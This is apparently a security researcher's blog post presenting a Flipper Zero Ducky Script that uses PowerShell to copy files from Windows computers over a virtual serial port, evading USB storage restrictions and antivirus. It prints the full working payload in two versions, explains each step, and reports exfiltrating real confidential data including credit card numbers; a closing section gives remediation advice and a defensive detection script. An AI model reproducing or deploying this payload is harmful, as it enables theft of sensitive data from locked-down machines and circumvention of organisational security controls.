Author: Danilo Erazo

I was approached to conduct on-site Wi-Fi hacking and penetration testing, including executing local data exfiltration on secured computers that block the use of USB storage devices. To address this challenge, I researched methods for exfiltrating data from such protected systems. As a result, I developed a Ducky Script that leverages PowerShell to exfiltrate files via a serial port. At the end, I was able to exfiltrate a big confidential file with country IDs, names, credit card numbers, addresses, mobile telephone numbers and more. This is a new technique I discovered, and I will demonstrate it in this post. Additionally, no AV has detected it at any point.
1) Requirements:
- Flipper Zero.
- Victim Windows Computer: Tested on Windows 10 and 11.
- PowerShell enabled on victim computer.
- File to exfiltrate: At the moment only txt files (you can paste whatever content in a txt file).
2) Theory:
In general, companies set USB storage restrictions using a GPO on all Windows computers, for example, with this configuration:

Serial Device Classification:
- The Flipper Zero, when in serial mode, registers as a USB virtual COM port and not as a mass storage device. USB storage restrictions (policies or group settings) typically apply to devices classified under the mass storage device class (USB class code 08) but not to serial ports.
- As a serial port device, the Flipper bypasses policies that block USB drives.
Direct Data Transmission:
- Instead of relying on traditional filesystem-based access (as would happen with USB mass storage), the script uses the serial communication channel to transfer the file’s raw content directly to the Flipper.
- This is fundamentally different from how USB storage devices operate, as it does not involve mounting a filesystem.
Serial Ports Are Typically Trusted:
- Most systems, even those with strict USB storage restrictions, do not block or monitor serial ports because:
  - They are often used for legitimate debugging, IoT, or device communication purposes.
  - Blocking them could disrupt critical workflows.
Custom Command Protocol:
- The storage write command sent to the Flipper is part of its internal command interpreter. This allows the script to directly instruct the Flipper to save the transmitted data to its SD card, bypassing any filesystem restrictions on the host computer.
KEY INSIGHTS:
- No Storage Driver Needed: The Flipper does not mount as a drive but communicates via serial commands. This avoids USB mass storage restrictions.
- Serial Devices Bypass Restrictions: The script leverages the fact that serial devices are not subject to USB storage control policies.
- Flipper’s Flexibility: The Flipper’s ability to switch between BadUSB (HID) and serial modes is key. Once out of HID mode, it acts as a serial device, which allows exfiltration without triggering USB storage policies.
3) Ducky script analysis
Main part of the Ducky script:
ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($fileContent);$p.Write("$([char] 3)");$p.Close();break}Catch{If(Get-PNPDevice -PresentOnly|Where {$_.InstanceID -match $BHID}){"BadUSB"}Else{"NoFZ";Start-Sleep 4};Start-Sleep 1}}
REM ## Shorter Version, without debug output, no 4 Sec delay, exits powershell upon completion (useful when using powershell -w h)
REM ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly -Class 'Ports' -InstanceID 'USB\VID_0483&PID_5740*') -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($fileContent);$p.Write("$([char] 3)");$p.Close();break}Catch{Sleep 1}};exit
Detection of USB Device Mode:
- The script identifies whether the Flipper Zero is in BadUSB mode or has switched to another mode (serial device mode).
- The line:
If(Get-PNPDevice -PresentOnly|Where {$_.InstanceID -match $BHID})
checks for a device matching the BadUSB VID (VID_046D) and determines if the Flipper is still emulating a keyboard (HID mode).
Fallback to Serial Port Mode:
- If the Flipper is not in BadUSB mode, the script searches for a device with the serial mode VID and PID (VID_0483 and PID_5740):
COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])
This retrieves the COM port where the Flipper Zero is registered.
Establishing a Serial Connection:
- The script opens a serial connection to the Flipper:
$p=New-Object System.IO.Ports.SerialPort("COM...",115200,'None',8,'one')
It configures the connection for 115200 baud rate with no parity, 8 data bits, and 1 stop bit (a common serial configuration). The use of System.IO.Ports.SerialPort enables direct communication with the Flipper Zero as a serial device.
Sending Data Over Serial:
- After opening the serial connection ($p.open()), the script sends commands and file content:
$p.Write("storage write $SPATH `r`n")
$p.Write($fileContent)
$p.Write("$([char] 3)")
- storage write $SPATH: This command tells the Flipper to prepare for writing to its internal storage or SD card at the specified path.
- $fileContent: The actual file data is streamed byte-by-byte over the serial connection.
- $([char] 3): This likely signals the end of the data transfer (Control-C or similar).
Loop and Retry:
- The 1..600 loop retries the process up to 600 times, checking if the Flipper is connected in serial mode (storage mode) and reattempting the transfer every second. If no Flipper is detected, it sleeps for 4 seconds before retrying.
4) Executing the attack
When you execute this attack, no AV detects it! Check the steps and the Ducky script in my GitHub repository: exfiltrate-pc2flipper

You can watch the tutorial on my YouTube channel:
5) Remediation
Organizations can take the following steps to block such mechanisms:
- Restrict Serial Devices: Use security policies to block unauthorized serial devices via their VID/PID or class.
- Monitor Serial Port Usage: Log and alert on suspicious serial port activity, such as the unexpected opening of a serial port.
- Disable Unnecessary USB Ports: Physically disable unused USB ports or configure the system to block unauthorized USB devices altogether.
- Endpoint Protection: Use tools that can detect abnormal usage of serial ports and alert on unusual PowerShell activities.
- Restrict PowerShell Usage: Implement PowerShell Constrained Language Mode or other restrictions to limit its ability to execute unauthorized scripts, or disable PowerShell.
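The "Restrict Serial Devices" and "Monitor Serial Port Usage" items above, sketched as an added example (not code from the original post or its repository): one function flags Ports-class USB devices that are not on a VID/PID allowlist, the other flags logged script blocks that open a .NET serial port. The function names, the allowlist entry and all sample records are assumptions constructed for illustration; live use of the second check assumes PowerShell script block logging (event ID 4104) is enabled.

```powershell
# Added example (defensive audit). All sample data below is constructed.
# Approved USB serial adapters as -like patterns. Hypothetical entry: use your own inventory.
$ApprovedSerial = @('USB\VID_0403&PID_6001*')

function Find-UnapprovedSerialDevice {
    param([object[]]$Device, [string[]]$Approved)
    # Ports-class USB devices whose InstanceId matches no approved VID/PID pattern.
    $Device | Where-Object {
        $id = $_.InstanceId
        $_.Class -eq 'Ports' -and $id -like 'USB\*' -and
            -not ($Approved | Where-Object { $id -like $_ })
    }
}

function Find-SerialPortScriptBlock {
    param([string[]]$ScriptBlockText)
    # Script blocks that open a .NET serial port or enumerate Ports-class devices.
    $pattern = 'System\.IO\.Ports\.SerialPort|Get-PnpDevice.*Ports'
    $ScriptBlockText | Where-Object { $_ -match $pattern }
}

# Constructed device records shaped like Get-PnpDevice output.
$sampleDevices = @(
    [pscustomobject]@{ Class = 'Ports';    InstanceId = 'USB\VID_0483&PID_5740\CONSTRUCTED1'; FriendlyName = 'USB Serial Device (COM5)' }
    [pscustomobject]@{ Class = 'Ports';    InstanceId = 'USB\VID_0403&PID_6001\CONSTRUCTED2'; FriendlyName = 'USB Serial Port (COM3)' }
    [pscustomobject]@{ Class = 'Keyboard'; InstanceId = 'USB\VID_046D&PID_0000\CONSTRUCTED3'; FriendlyName = 'HID Keyboard Device' }
)

# Constructed script block texts shaped like event ID 4104 content.
$sampleScriptBlocks = @(
    '$p = New-Object System.IO.Ports.SerialPort("COM5",115200,"None",8,"one"); $p.Open()'
    'Get-ChildItem C:\Temp | Measure-Object'
)

# Only the VID_0483&PID_5740 serial device is reported; the approved adapter and the keyboard are not.
Find-UnapprovedSerialDevice -Device $sampleDevices -Approved $ApprovedSerial |
    Select-Object FriendlyName, InstanceId

# Only the script block that opens a SerialPort is reported.
Find-SerialPortScriptBlock -ScriptBlockText $sampleScriptBlocks

# Live use on an endpoint:
#   Find-UnapprovedSerialDevice -Device (Get-PnpDevice -PresentOnly -Class Ports) -Approved $ApprovedSerial
#   $text = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#       ForEach-Object { $_.Message }
#   Find-SerialPortScriptBlock -ScriptBlockText $text
```

Legitimate tooling such as firmware flashers and lab equipment utilities also opens serial ports, so treat hits as leads to correlate with the device inventory rather than as verdicts.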
Let me know anything and reverse everything!
My Telegram: @revers3everything